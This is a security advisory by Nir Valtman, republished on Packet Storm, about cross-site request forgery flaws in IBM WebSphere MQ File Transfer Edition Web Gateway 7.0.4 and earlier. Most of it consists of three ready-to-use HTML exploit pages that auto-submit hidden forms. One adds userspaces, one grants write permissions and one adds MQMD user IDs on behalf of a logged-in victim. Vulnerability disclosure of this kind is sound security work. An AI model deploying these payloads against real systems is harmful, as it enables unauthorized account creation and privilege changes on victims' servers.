IBM WebSphere MQ File Transfer Edition Web Gateway suffers from a cross site request forgery vulnerability.
06b2bda21b62241e495908f7f89cca912345a066fc02b98fb7be62e23b3b7da5*Exploit Author:* Nir Valtman
*Description:* Malicious user is able to add userspace, change permissions
on existing userspace and add MQMD (MQ Message Descriptor) user IDs. All of
the these vulnerabilities can be exploited using a CSRF (Cross Site Request
Forgery) attack.
Few days ago the CVE has
been published here<https://www-01.ibm.com/support/docview.wss?uid=swg21607482>
*
*
*Affected Platforms: *Version 7.0.4 and all previous versions of WebSphere MQ
File Transfer Edition<https://publib.boulder.ibm.com/infocenter/wmqfte/v7r0/index.jsp>running
on all platforms are affected.
* *
*
*
*Exploit Details:*
*1. CSRF To add user and define his quota on a userspace*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form id="frm" method="post"
action="https://*[ip-address-and-port]* /wmqfteconsole/Filespaces"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="name" value="zzzzzz" />
<input type="hidden"
name="quota" value="15" />
<input type="hidden"
name="id" value="NewFileSpace" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
See the following screenshot, which follows the execution of CSRF attack:
[image: Inline image 1]
*2. CSRF to add permissions on file spaces:*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form id="frm" method="post"
action="https://*[ip-address-and-port]*
/wmqfteconsole/FileSpacePermisssions"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="user" value="bodek2" />
<input type="hidden"
name="write" value="authorized" />
<input type="hidden"
name="id" value="zzzzzz_TEMP_PERMISSIONS" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
See the following screenshot, which follows the execution of CSRF attack:
[image: Inline image 2]
*2. CSRF to add MQMD user id:*
I created the following HTML page and then opened it by a logged-on user:
<html>
<head></head>
<body>
<form id="frm" method="post"
action="https://*[ip-address-and-port]*/wmqfteconsole/UploadUsers"
<input type="hidden"
name="nirvcsrf" value="junk" />
<input type="hidden"
name="userID" value="csrfUserId" />
<input type="hidden"
name="mqmdUserID" value="userIdTest" />
<input type="hidden"
name="id" value="NewUploadUser" />
</form>
<script>
document.frm.submit();
</script>
</body>
</html>
See the following screenshot, which follows the execution of CSRF attack:
[image: Inline image 3]
Best Regards,
Nir Valtman
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed